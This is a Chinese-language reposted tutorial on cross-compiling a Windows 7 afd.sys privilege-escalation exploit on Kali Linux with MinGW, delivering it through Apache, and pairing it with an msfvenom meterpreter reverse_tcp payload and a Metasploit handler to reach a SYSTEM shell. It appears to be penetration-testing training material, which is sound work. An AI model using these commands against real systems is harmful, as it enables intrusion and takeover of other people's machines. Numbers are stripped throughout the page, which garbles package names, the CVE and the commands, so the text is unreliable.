位置: 编程技术 - 正文

在Kali Linux上编译Windows漏洞的方法(kali linux 视频教程)

编辑:rootadmin

推荐整理分享在Kali Linux上编译Windows漏洞的方法(kali linux 视频教程),希望有所帮助,仅作参考,欢迎阅读内容。

文章相关热门搜索词:kali linux使用方法,kali-linux,kali linux指令合集,kali linux的各种玩法,kali linux使用教程,kali-linux-all,kali linux使用教程,kali linux使用方法,内容如对您有帮助,希望把文章链接给更多的朋友!

如何在Kali Linux上编译Windows漏洞!

Mingw-w是一个用于创建Windows应用程序的自由和开源软件开发环境。 Mingw-w最初叫Mingw,它当时不支持位架构。在本教程中,我们将讨论如何使用Mingw-在 Kali Linux上编译Windows漏洞。 让我们开始在Kali Linux上安装Mingw-w。

Mingw-w是一个用于创建Windows应用程序的自由和开源软件开发环境。 Mingw-w最初叫Mingw,它当时不支持位架构。

在本教程中,我们将讨论如何使用Mingw-在 Kali Linux上编译Windows漏洞。 让我们开始在Kali Linux上安装Mingw-w。

1、在Kali Linux上安装Mingw-w

默认情况下,Kali Linux .2和更低版本上未安装Mingw-w。 因此,我们需要先安装它,然后才能在Linux上编译Windows漏洞。 执行以下命令,安装Mingw-w:

apt-get update apt-get install mingw-w

使用apt-get install mingw-w在您的Kali主机上安装mingw-w。

键入y为yes,以确认并继续Mingw-w安装过程。 下载和安装Mingw-w可能需要一段时间才能完成。

2、无法找到程序包mingw-w的解决方法

有时,你尝试安装mingw-w包时得到一个无法找到包mingw-w的错误,并得到类似如下提示:

root@kali:~# apt-getinstall mingw-w Reading package lists…Done Building dependency tree Reading stateinformation… Done E: Unable to locatepackage mingw-w

要解决这个问题,请确保在sources.list文件中具有正确的存储库。您可以使用nano编辑文件:

/etc/apt/sources.list

确保您在此文件中具有正确的存储库。 您可以在以下页面上找到不同版本的Kali Linux的存储库:

update,然后再次运行Mingw-w软件包的安装命令。

3、用Mingw-w交叉编译Windows漏洞利用

现在我们已经安装了Mingw-w,可以开始编译Windows漏洞利用程序了。 对于本教程,我们将编译一个用C编写的Windows漏洞利用程序,以利用Windows 7 SP0 x中的CVE--(MS-)漏洞。 此版本的Windows操作系统在辅助功能驱动程序(AFD)中包含一个漏洞,允许已认证的非管理用户提升权限。即使Mingw-w是为非常需要的位支持开发的,我们也可以编译位Windows漏洞。 让我们来看看如何编译位Windows漏洞。

让我们从Exploit-db下载漏洞:

wget --output-document= .c 位的afd.sys exploit:

i-w-mingw-gcc[input file: source]–o [output file: .exe]-lws2_

以下命令将编译Windows 7 afd.sys特权升级漏洞:

i-w-mingw-gcc .c –o exploit.exe –lws2_

编译Windows漏洞。

要将漏洞利用程序转移到目标主机,我们将使用内置的ApacheWeb服务器来提供它。 最后2个命令会将exploit复制到Apache主目录并启动Apache Web服务器。

在Kali Linux上编译Windows漏洞的方法(kali linux 视频教程)

当我们从cmd.exe下载并执行该漏洞时,它将如下所示:

漏洞利用成功执行。

因为我们可以看到whoami命令在执行exploit之前返回一个普通用户权限,之后显示是system用户权限。这个exploit实际上在当前shell中生成一个新的shell,而不是在新窗口中创建一个新的shell。这意味着我们也可以从命令行shell运行此漏洞利用程序,例如Meterpreter。让我们看看如何从Meterpreter会话运行漏洞利用。

4、利用编译错误

当编译针对不同架构和操作系统的漏洞时,可能会发生许多错误。有很多因素可能导致编译失败,例如:语法,库,主机和目标体系结构,用于编译代码的已安装软件等等。一些错误可能很容易修复,有些错误则不是。同样重要的是不同的警告来自致命的错误,因为警告可能只是指示一些类似的过时的功能,不能阻止漏洞的工作。致命错误会阻止漏洞利用,因此需要修复。

处理编译错误的最佳方法是仔细阅读,然后在Google上搜索解决方案。通常你不是第一个也不是唯一面对某个编译错误的人,因此没有必要重新发明轮子。在线资源(如堆栈交换)通常为您提供最常见的编译错误的可能解决方案。

5、从Meterpreter shell中利用MS-

让我们使用Msfvenom快速生成Windows 位Meterpreter反向TCP有效负载,并在目标主机上执行它。 我们将在Metasploit中使用多处理程序来捕获反向shell。

使用以下命令使用Msfvenom创建有效负载:

msfvenom -a x –platform Windows -p windows/meterpreter/reverse_tcpLHOST=[IP attackbox] LPORT= -e x/shikata_ga_nai –f exe –o exploit.exe

请务必更换侦听主机IP,必要时更换侦听端口。现在启动msfconsole并运行以下命令来设置多处理器漏洞:

use exploit/multi/handler set lhost [listening host IP] set lport run

在端口上启动反向TCP处理程序。

然后下载利用程序到目标主机并执行它。 如果一切设置正确,您应该在msfconsole上收到一个反向Meterpreter shell:

目标主机连接回Kali。

在Meterpreter命令行上运行下一“shell”命令并运行特权升级漏洞利用程序将shell升级到系统shell:

特权升级攻击通过我们的Meterpreter会话成功执行。

正如你可以看到的,shell从特权测试用户shell变化到系统shell。 请注意,在执行它的shell中生成一个新的系统shell。 因此,我们不能看到利用输出,因为它是在有限的特权的旧shell。

您可以通过键入Exit来验证这一点,将退出系统shell并返回到仍包含Windows 7权限升级exploit输出的用户shell:

特权用户shell上的exploit输出。

学到的东西

在本教程中,我们已经了解了在Linux上针对Windows的交叉编译漏洞的基础知识。 我们已经学习了如何在Kali Linux上安装Mingw-w并解决最常见的安装问题。 为了练习漏洞编译过程,我们编译了一个针对Windows7 x的特权提升漏洞。 这也称为交叉编译。

我们已成功的在目标主机上执行已编译的可执行文件,并将shell从有限的用户shell升级到系统shell。 我们已经知道,这个特殊的exploit在shell中生成了一个shell,在这个shell中执行了exploit。 这样,我们还可以从命令行(例如Meterpreter shell)执行特权提升漏洞利用。

最后但同样重要的是,我们已经了解了如何在编译过程中修复错误。

容器内存占用之系统cache介绍 缘起:监控(dockerstats)显示容器内存被用完了,进入容器瞅了瞅,没有发现使用内存多的进程,使用awk等工具把容器所有进程使用的内存加起来看看,

如何安装MeeGo和Windows 7双系统? 第一步:准备一个大于2G的U盘,因为meego系统大约1G,大一点比较好。第二步:整理磁盘腾出新的空间来安装meego系统。在windows下我的电脑,右击管理-磁

中兴新支点操作系统全面支持龙芯3A 附新特性 作为中国芯的代表,龙芯处理器这几年不断取得突飞猛进,规格性能大大提高,已经达到芯国际先进水平。更可喜的是,生态支持也日趋完善,操作系

标签: kali linux 视频教程

本文链接地址:https://www.jiuchutong.com/biancheng/354055.html 转载请保留说明!

上一篇:VMWare虚拟机下Linux无法全屏的解决方法(虚拟机vmware下载教程)

下一篇:容器内存占用之系统cache介绍(容器内存限制)

  • 应交增值税月末出现借方余额怎么处理
  • 财税实务与核算会计的区别在哪里?
  • 残疾人就业保障金
  • 出借包装物收到押金
  • 利息收入记借方负数表示增加还是减少
  • 一般纳税人劳务费税率是13还是6
  • 刚成立的公司没有营业额怎么报税
  • 销售部门快递费用怎么算
  • 个税计提和发放分录
  • 外币账户间互转流程
  • 扣缴外国企业所得税分录
  • 企业结转已销产品的生产成本
  • 发票已经开但是没有收到发票怎么做
  • 小规模9万是含税吗
  • 金税盘锁死去税务局流程
  • 收到的运输发票要交印花税吗?
  • 当期出售其他权益怎么算
  • 银行中间业务能开具增值税专票吗
  • 数量和单价的乘积
  • 公司收到汽车理赔款
  • 资产无偿调拨账务处理
  • 电脑开机后一直滴滴
  • 吸甲醛最好的植物是什么?
  • 如何解决win10系统复制文件速度
  • 企业投资收益如何做账
  • wamp搭建网站教程
  • 会计中在建工程与建筑安装工程的区别
  • uefi和legacy的区别对显卡兼容
  • 股东以固定资产入股需要交税吗
  • 银行存款账面余额与银行账户余额
  • php代码生成
  • 工程项目会计怎么样
  • 购买增值税税控系统如何抵扣增值税
  • 前端资源浏览器下载
  • php返回数组
  • 票据带息和不带息
  • 完税证明可以做为证据使用吗
  • 退休职工能否扣医保
  • mysql常用语
  • 抵扣以前年度进项税
  • 红冲上月发票都附什么附件
  • 进项税额抵扣如何做账
  • 支付技术研究开发费
  • 投资软件和信息技术服务业
  • 出租固定资产的折旧计入哪个科目
  • 盈余公积的会计分录
  • 财务独立核算的条件
  • 购买咨询服务费计入什么科目
  • 期间费用包括哪些费用
  • SQL Server SQL Agent服务使用教程小结
  • 如何把数据生成表格
  • xp ie浏览器无法显示网页
  • linux程序死机
  • linux 多网卡配置
  • opengl geometry shader
  • javascript中匿名函数
  • unity 读取txt
  • 经纬科技it6000
  • js删除数组中某一个对象
  • nodejs yield
  • css控制文字换行
  • js秒数转时间
  • 统计文件个数linux
  • python中pandas.DataFrame的简单操作方法(创建、索引、增添与删除)
  • angularjs1.5
  • jquery 刷新div
  • linux中的tree
  • shell脚本中执行命令语句
  • 能用javascript 最终
  • hbase获取所有表
  • JavaScript弹出窗口
  • 详解javascript事件冒泡
  • python多进程模块
  • 税务经侦科立案标准
  • 12366纳税服务热线工作时间
  • 国税局和税务稽查的区别
  • 重庆国税局客服电话
  • 建筑行业增值税税收优惠政策
  • 湖北国家税务局发票查询
  • 五险一金和公积金冲突吗
  • 免责声明:网站部分图片文字素材来源于网络,如有侵权,请及时告知,我们会第一时间删除,谢谢! 邮箱:opceo@qq.com

    鄂ICP备2023003026号

    网站地图: 企业信息 工商信息 财税知识 网络常识 编程技术

    友情链接: 武汉网站建设